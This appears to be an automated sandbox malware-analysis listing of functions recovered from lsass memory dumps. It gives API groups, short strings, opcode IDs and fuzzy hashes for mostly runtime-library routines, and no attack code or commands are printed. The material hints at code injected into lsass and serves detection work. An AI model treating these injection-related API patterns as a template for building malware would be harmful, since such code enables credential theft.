                                                    Function 00000213BDCE104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061505937.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdce0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                    • String ID: d
                                                    • API String ID: 3743429067-2564639436
                                                    • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                    • Instruction ID: c9b898f511c2e52726208957a962c9b291cdc106b1d13140a09b1ea003ed6b20
                                                    • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                    • Instruction Fuzzy Hash: 9E417273218B84C6EB60CF21E4487DE77A2F399B9CF048125DA894B758EF39D659CB00
                                                    Function 00000213BDCED068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • FlsGetValue.KERNEL32(?,?,?,00000213BDCEC7DE,?,?,?,?,?,?,?,?,00000213BDCECF9D,?,?,00000001), ref: 00000213BDCED087
                                                    • FlsSetValue.KERNEL32(?,?,?,00000213BDCEC7DE,?,?,?,?,?,?,?,?,00000213BDCECF9D,?,?,00000001), ref: 00000213BDCED0A6
                                                    • FlsSetValue.KERNEL32(?,?,?,00000213BDCEC7DE,?,?,?,?,?,?,?,?,00000213BDCECF9D,?,?,00000001), ref: 00000213BDCED0CE
                                                    • FlsSetValue.KERNEL32(?,?,?,00000213BDCEC7DE,?,?,?,?,?,?,?,?,00000213BDCECF9D,?,?,00000001), ref: 00000213BDCED0DF
                                                    • FlsSetValue.KERNEL32(?,?,?,00000213BDCEC7DE,?,?,?,?,?,?,?,?,00000213BDCECF9D,?,?,00000001), ref: 00000213BDCED0F0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061505937.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdce0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: Value
                                                    • String ID: 1%$Y%
                                                    • API String ID: 3702945584-1395475152
                                                    • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                    • Instruction ID: 19c205c0411bc615aa3bccdf6f4f64bbad6ab17fba574e3ff0c824cae7453082
                                                    • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                    • Instruction Fuzzy Hash: 801184B070D24843FD64D725655E3E962475BB43FCF188338A87D466DAFE3AE7024600
                                                    Function 00000213BDCE7510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061505937.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdce0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                    • String ID:
                                                    • API String ID: 190073905-0
                                                    • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                    • Instruction ID: 551094e2023b39dc9ace01dde74fdb1ba5573d69ed1bde9d232f088fcbd9e271
                                                    • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                    • Instruction Fuzzy Hash: 2B81D3B160C24987FE60EB66A44D3D92293ABB578CF344439E944477D6FB3BEB468700
                                                    Function 00000213BDCE9DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061505937.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdce0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: Library$Load$AddressErrorFreeLastProc
                                                    • String ID: api-ms-
                                                    • API String ID: 2559590344-2084034818
                                                    • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                    • Instruction ID: 4d4d0faf7020efbe67ed0a855dfe3d6003a087379504cbf48fb87940a6e137d3
                                                    • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                    • Instruction Fuzzy Hash: 6631C57121A744D2EE25DB42A4087D57296F768BACF590935DE1E0B394FF3AE7458300
                                                    Function 00000213BDCF3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061505937.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdce0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                    • String ID: CONOUT$
                                                    • API String ID: 3230265001-3130406586
                                                    • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                    • Instruction ID: 1e37ad57197f2f5fd627e52480ce6183fe70d503e9319598513a9094b24cedb1
                                                    • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                    • Instruction Fuzzy Hash: DC118631718B4086EB50CB52F8583D976A1F7A8FECF144214EE5A8B798EF39C7188744
                                                    Function 00000213BDCE3790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061505937.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdce0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: CurrentProcessProtectVirtual$HandleModule
                                                    • String ID: wr
                                                    • API String ID: 1092925422-2678910430
                                                    • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                    • Instruction ID: 12712e2fa7eb8b967a2fcefc972e563151717b3967eefe160898bd9f6f4aa3e4
                                                    • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                    • Instruction Fuzzy Hash: E7115A76308B4583EF14DB11E4082A962B2F799B8DF14012ADE890B758FF3ED709C704
                                                    Function 00000213BDCE5B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061505937.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdce0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: Thread$Current$Context
                                                    • String ID:
                                                    • API String ID: 1666949209-0
                                                    • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                    • Instruction ID: 3446894e02afeb19a9966952644c75a0c5e86968940c19ee8a431a5bd0db41b7
                                                    • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                    • Instruction Fuzzy Hash: B6D18176219B4882DA70DB06E49439A7BA1F7D8B8CF100126EACD47BA9DF3DD751CB40
                                                    Function 00000213BDCE2F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061505937.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdce0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$AllocFree
                                                    • String ID: dialer
                                                    • API String ID: 756756679-3528709123
                                                    • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                    • Instruction ID: 44251474c1ee8a42ccd6e3d1f93cc1b766dec72a69286a1cba37760e0419152a
                                                    • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                    • Instruction Fuzzy Hash: FC31B572709B59C3EE14CF1695487A9A7A2FB68B8CF044030AE4807B55FF36E7658700
                                                    Function 00000213BDCECFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061505937.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdce0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: Value$ErrorLast
                                                    • String ID:
                                                    • API String ID: 2506987500-0
                                                    • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                    • Instruction ID: 77ac6954afd6c966781107e5719d7c64fe3f53195b268d9a5bd80fbe793f95d1
                                                    • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                    • Instruction Fuzzy Hash: 08118EB024D28843FE24D321665E3E962435BB47BCF144738A87A477DAFE3AAB018700
                                                    Function 00000213BDCE199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061505937.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdce0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                    • String ID:
                                                    • API String ID: 517849248-0
                                                    • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                    • Instruction ID: 3eb0d0c2679584ddfa503f59038269ae77ed88556fc385ff5f1d0553037a01c9
                                                    • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                    • Instruction Fuzzy Hash: F0015B71308A4482EA20DB52A4487D963A2F798BCCF588035DE4A47758EF39CB49C700
                                                    Function 00000213BDCE36C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061505937.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdce0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                    • String ID:
                                                    • API String ID: 449555515-0
                                                    • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                    • Instruction ID: 88d3306e3c19d980f3158101e8290f900e8424f24f65f37777eb6f4afb0b7499
                                                    • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                    • Instruction Fuzzy Hash: 0B015B7421AB4482EF24DB21F81D79632A2FB65B8EF140428C9890B758FF3EC7088714
                                                    Function 00000213BDCE9005 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061505937.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdce0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                    • String ID: csm$f
                                                    • API String ID: 2395640692-629598281
                                                    • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                    • Instruction ID: d5e1b5ca961c770c041380f95d354e3cdbdec886acd4ce3b24cae478a2db64e3
                                                    • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                    • Instruction Fuzzy Hash: EE517AB26096088BEF24DB25E44CB993797F369B8CF508134DA1687788FE76EB418700
                                                    Function 00000213BDCE8FE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061505937.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdce0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                    • String ID: csm$f
                                                    • API String ID: 2395640692-629598281
                                                    • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                    • Instruction ID: a6b60b47365312ed9fb6cffc76a32eb8d6561a2d91ecc7083e293e1ea37e8388
                                                    • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                    • Instruction Fuzzy Hash: B631BFB220964487EF14DF22E84C79977A6F368B8CF458124EE5647789EF3AEB44C704
                                                    Function 00000213BDCE1A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061505937.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdce0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: FinalHandleNamePathlstrlen
                                                    • String ID: \\?\
                                                    • API String ID: 2719912262-4282027825
                                                    • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                    • Instruction ID: 9a3ceae17c6c449fcd09eca06c2232397e8d057c9f4e4c09271c551668b01824
                                                    • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                    • Instruction Fuzzy Hash: 4AF0317230864592EF70CB21E8887D96762F768B9CF945020DA494A558EB3DC74DCB00
                                                    Function 00000213BDCEBC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061505937.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdce0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                    • String ID: CorExitProcess$mscoree.dll
                                                    • API String ID: 4061214504-1276376045
                                                    • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                    • Instruction ID: 540f723a61500467f8a8b8c4ca4f47b4269590684ce67fd343b054dd3f87c0fa
                                                    • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                    • Instruction Fuzzy Hash: EEF0627121960582EF14CF24E44D3E96363EBA576DF540229CA6A492E8EF3EC34CC300
                                                    Function 00000213BDCE3044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061505937.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdce0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: CombinePath
                                                    • String ID: \\.\pipe\
                                                    • API String ID: 3422762182-91387939
                                                    • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                    • Instruction ID: 143933a49c9e38150b676d3b6c803f89c80bf75aa8c52dce601b1f25c80bbb55
                                                    • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                    • Instruction Fuzzy Hash: 13F0F874718B8482EE14CB52B9181D96662AB68FDDF089130EE4A4BB18EE3DD74D8700
                                                    Function 00000213BDCE50D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061505937.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdce0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: CurrentThread
                                                    • String ID:
                                                    • API String ID: 2882836952-0
                                                    • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                    • Instruction ID: ff1cd853ef15dbd82275a915282ff6a598436b67fb0be58782aaa7236b1550e1
                                                    • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                    • Instruction Fuzzy Hash: 3502EF7221DB8486DB60CB55F45439ABBA1F3D4798F100125EACE87BA9DF7DDA44CB00
                                                    Function 00000213BDCE5710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061505937.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdce0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: CurrentThread
                                                    • String ID:
                                                    • API String ID: 2882836952-0
                                                    • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                    • Instruction ID: d223e9dcadd96ac9e86b04a6cfbd1f11c297519e412362c6c507cdbf370bb6f3
                                                    • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                    • Instruction Fuzzy Hash: 4361DC7652CB44C7EA60CB15E45835A7BA1F39478CF500129E68E87BA8EB7DDB51CF00
                                                    Function 00000213BDCC3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061237265.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdcb0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: _set_statfp
                                                    • String ID:
                                                    • API String ID: 1156100317-0
                                                    • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                    • Instruction ID: d2d7dd6e1439f03189a3226a9b5cce41787e5537534634c01bb2080864e62fb7
                                                    • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                    • Instruction Fuzzy Hash: D711E73265CE0101FE949328F44E3E910836B79B7CF4D4728AF66063D6FA36DB4042C1
                                                    Function 00000213BDCF4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061505937.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdce0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: _set_statfp
                                                    • String ID:
                                                    • API String ID: 1156100317-0
                                                    • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                    • Instruction ID: f9e4e7116411792c9900663e4fd0b77c758cabd73c1539257dc2faf97d7e1066
                                                    • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                    • Instruction Fuzzy Hash: C311C132A1CA4711FF649568D4DD3E511436B783BCF188A24E9764E6DEEB36CB4C4200
                                                    Function 00000213BDCE9650 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061505937.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdce0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast
                                                    • String ID:
                                                    • API String ID: 1452528299-0
                                                    • Opcode ID: 46c896f13dff0714c7ccebb8ca9383bb675cc38bcf091c92c481f4a556b8b138
                                                    • Instruction ID: 32291ebe63344caa2b2a00819642319f6feb277e8a2eeb88ccaa8891375a908e
                                                    • Opcode Fuzzy Hash: 46c896f13dff0714c7ccebb8ca9383bb675cc38bcf091c92c481f4a556b8b138
                                                    • Instruction Fuzzy Hash: 4311B4B021925843FE60DB61A84D3E832976BA47ECF044635E966477DAFE3AEB41C300
                                                    Function 00000213BDCBF040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061237265.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdcb0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                    • API String ID: 3215553584-4202648911
                                                    • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                    • Instruction ID: dd33b7bdeea741fb6d5fb3879698249c2b400a189a1bb143957139dfcfd1a244
                                                    • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                    • Instruction Fuzzy Hash: E561F73668E20842FE6ACB28E54C3EE6BA3E77174CF545815CA46177A5FB37CB418301
                                                    Function 00000213BDCEAA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061505937.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdce0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: CallEncodePointerTranslator
                                                    • String ID: MOC$RCC
                                                    • API String ID: 3544855599-2084237596
                                                    • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                    • Instruction ID: 1fa883078d8b0df735174c791d3315410991ce76529377e33f37aec33171b3e6
                                                    • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                    • Instruction Fuzzy Hash: 876179B3608B88CAEB10DF65D0443DD77A2F364B8CF144225EE4957B98EB39E284C704
                                                    Function 00000213BDCBA178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061237265.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdcb0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                    • String ID: csm$csm
                                                    • API String ID: 3896166516-3733052814
                                                    • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                    • Instruction ID: f6b80d2922ff79a09da4c367b45cc3c1b98fc3b25da29179d71979c1a959d6c1
                                                    • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                    • Instruction Fuzzy Hash: E351AF32188288CAEF64CB15D44839C77A2F365B8CF185116DACD87BD5EB7AD750C709
                                                    Function 00000213BDCEAD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061505937.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdce0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                    • String ID: csm$csm
                                                    • API String ID: 3896166516-3733052814
                                                    • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                    • Instruction ID: 3c048601c7fcc0ffe57f7261eab226645e3cc41df1823d05877d79c368e95740
                                                    • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                    • Instruction Fuzzy Hash: FD515FB2108388CFEF64CB159588399B7A2F364B8DF184125EA5D87B95EB39E760C704
                                                    Function 00000213BDCB8405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061237265.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdcb0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: CurrentImageNonwritable__except_validate_context_record
                                                    • String ID: csm$f
                                                    • API String ID: 3242871069-629598281
                                                    • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                    • Instruction ID: dc5653ac438f2d6e495d45b1ca0cfa69a93c7d117f4fad526aed404aa48302df
                                                    • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                    • Instruction Fuzzy Hash: 2D51ED327592088AEF19CF15E448B9837A6FB68B9CF548024DA0643788FB36DF458B08
                                                    Function 00000213BDCB83E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061237265.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdcb0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: CurrentImageNonwritable__except_validate_context_record
                                                    • String ID: csm$f
                                                    • API String ID: 3242871069-629598281
                                                    • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                    • Instruction ID: 82ec953c2abcd69afeb9a379956e593d8954b52f8e7d0185f21bbf325504b95f
                                                    • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                    • Instruction Fuzzy Hash: A331C23165974486EF19DF11E8487993BA6FB68F8CF058014EE5B03788EB3ACB41CB48
                                                    Function 00000213BDCF2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                    Download Yara Rule
                                                    APIs
